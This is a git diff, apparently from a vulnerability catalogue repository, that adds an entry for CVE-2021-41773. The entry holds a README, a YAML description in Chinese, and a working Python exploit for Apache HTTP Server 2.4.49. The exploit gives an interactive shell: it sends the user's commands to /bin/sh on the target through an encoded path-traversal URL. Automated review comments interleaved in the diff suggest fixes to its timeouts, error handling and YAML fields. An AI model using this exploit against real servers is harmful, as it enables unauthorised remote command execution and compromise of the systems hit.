diff --git a/cve/apache/2021/CVE-2021-41773/README.md b/cve/apache/2021/CVE-2021-41773/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..475e03c907fb387a44ed0ce2949fe70196166637
--- /dev/null
+++ b/cve/apache/2021/CVE-2021-41773/README.md
@@ -0,0 +1,19 @@
+# CVE-2021-41773
+
+> Apache2 2.4.49 - LFI & RCE Exploit
+
+## Info
+
+```bash
+# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
+# Exploit Author: Gaurav Raj https://gauravraj.xyz https://blog.gauravraj.xyz
+# Vendor Homepage: https://apache.org/
+# Version: 2.4.49
+# Tested on: 2.4.49
+# CVE : CVE-2021-41773
+```
+
+## Screenshots
+
+
+
diff --git a/cve/apache/2021/CVE-2021-41773/exploit.py b/cve/apache/2021/CVE-2021-41773/exploit.py
new file mode 100644
index 0000000000000000000000000000000000000000..8881dc23bffc9a6405a43645a87dab6f95c87ac7
--- /dev/null
+++ b/cve/apache/2021/CVE-2021-41773/exploit.py
@@ -0,0 +1,59 @@
+# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
+# Exploit Author: Gaurav Raj https://gauravraj.xyz
+# Vendor Homepage: https://apache.org/
+# Version: 2.4.49
+# Tested on: 2.4.49
+# CVE : CVE-2021-41773
+
+
+#!/usr/bin/python3
+
+import argparse
+import requests
+
+
+def runcmd(target):
+ url = 'http://{}'.format(target)
+ req = requests.get(url)
+ while True:
+ cmd = input("\033[1;36m>>> \033[0m")
+ if (cmd != 'exit'):
+ if ('https' not in req.url):
+ url = "http://{}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh".format(
+ target)
+ else:
+ url = "https://{}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh".format(
+ target)
+ data = "echo Content-Type: text/plain; echo; {}".format(cmd)
+ session = requests.Session()
+ req = requests.Request(
+ method='POST', url=url, data=data).prepare()
+ req.url = url
+ print(session.send(req).text, end='')
+
+ else:
+ exit(0)
+
+
+def banner():
+ print('''--------------------------------------------------------
+| \033[1;32mApache2 2.4.49\033[1;37m - \033[1;31mExploit\033[0m |
+--------------------------------------------------------''')
+
+
+def main():
+ parser = argparse.ArgumentParser(description="Apache2 2.4.49 Exploit")
+ parser.add_argument(
+ '-t', '--target', help='Specify the target IP or Domain. eg: 127.0.0.1 or example.com', required=True)
+ arg = parser.parse_args()
+ banner()
+ try:
+ runcmd(arg.target)
+ except KeyboardInterrupt:
+ exit(1)
+ except EOFError:
+ exit(1)
+
+
+if __name__ == '__main__':
+ main()
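Review bot: `requests.get(url)` at the top of `runcmd` and `session.send(req)` inside the loop carry no `timeout`, and neither `runcmd` nor `main` catches `requests.exceptions.RequestException`, so an unreachable or stalled target either blocks the tool indefinitely or ends in an uncaught traceback rather than the `exit(1)` path `main` already provides for interrupts; `req = requests.get(url, timeout=10)` plus an added `except requests.exceptions.RequestException: exit(1)` branch in `main` would cover both. The `#!/usr/bin/python3` line sits after the header comments instead of on line 1, so it is an ordinary comment and the file is not directly executable as the shebang suggests. `exit()` is the `site` module helper (absent under `python -S`), while `sys.exit(1)` with `import sys` is the portable form. A one-line comment on `req.url = url` stating why the prepared request's URL is overwritten would help the next maintainer, since the intent is not visible from the code itself.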
diff --git a/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png b/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png
new file mode 100644
index 0000000000000000000000000000000000000000..ffb6b632ba84fa641ceb8c471cae4d3ee1637155
Binary files /dev/null and b/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png differ
diff --git a/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png b/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png
new file mode 100644
index 0000000000000000000000000000000000000000..148a0748b7f26f105223cd8565a119261f51db92
Binary files /dev/null and b/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png differ
diff --git a/cve/apache/2021/yaml/KVE-2022-0206.yaml b/cve/apache/2021/yaml/KVE-2022-0206.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..48a8205edb0b8d7dc92a9657083587c436d2dbbe
--- /dev/null
+++ b/cve/apache/2021/yaml/KVE-2022-0206.yaml
@@ -0,0 +1,20 @@
+id: CVE-2021-41773
+source: https://github.com/thehackersbrain/CVE-2021-41773
+info:
+ name: Apache HTTP Server(简称 Apache)是开源的 Web 服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的 Web 服务器端软件之一。它快速、可靠并且可通过简单的 API 扩展,将 Perl/Python 等解释器编译到服务器中。
+ severity: high
+ description: |
+ Apache 披露了一个在 Apache HTTP Server 2.4.49 上引入的漏洞,称为 CVE-2021-41773。同时发布了2.4.50更新,修复了这个漏洞。该漏洞允许攻击者绕过路径遍历保护,使用编码并读取网络服务器文件系统上的任意文件。运行此版本 Apache 的 Linux 和 Windows 服务器都受到影响。此漏洞是在 2.4.49 中引入的,该补丁旨在提高 URL 验证的性能。可以通过对“.”进行编码来绕过新的验证方法。如果 Apache 网络服务器配置未设置为“要求全部拒绝”,则漏洞利用相对简单。通过对这些字符进行编码并使用有效负载修改 URL,可以实现经典的路径遍历。
+ scope-of-influence:
+ Apache HTTP = 2.4.49
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
+ - https://httpd.apache.org/security/vulnerabilities_24.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-41773
+ cwe-id: CWE-22
+ cnvd-id: None
+ kve-id: None
+ tags: cve2021,Apache,目录遍历
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index 52deae23bd4cbaf224d3b7294bcf6fd17806680d..fda618d64e897264be9f2a4adb7a959084404865 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -2,6 +2,7 @@ cve:
 apache:
 - CVE-2020-9490
+ - CVE-2021-41773
 linux-kernel:
 - CVE-2021-22555
 - CVE-2022-34918
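Review bot: The new file is named `KVE-2022-0206.yaml` while its `id` and `cve-id` are `CVE-2021-41773` and its `kve-id` is `None`, so either the filename or the `kve-id` field is wrong; if the entry does carry that KVE identifier it belongs in `kve-id: KVE-2022-0206`, otherwise the filename should match the `id`. `cnvd-id: None` and `kve-id: None` are read by YAML as the plain string `"None"` rather than a null value, which makes "no identifier" indistinguishable from a literal id for any consumer of this catalogue; `cnvd-id: null` (or `~`) expresses absence idiomatically. The file also ends without a trailing newline, as the `\ No newline at end of file` marker shows.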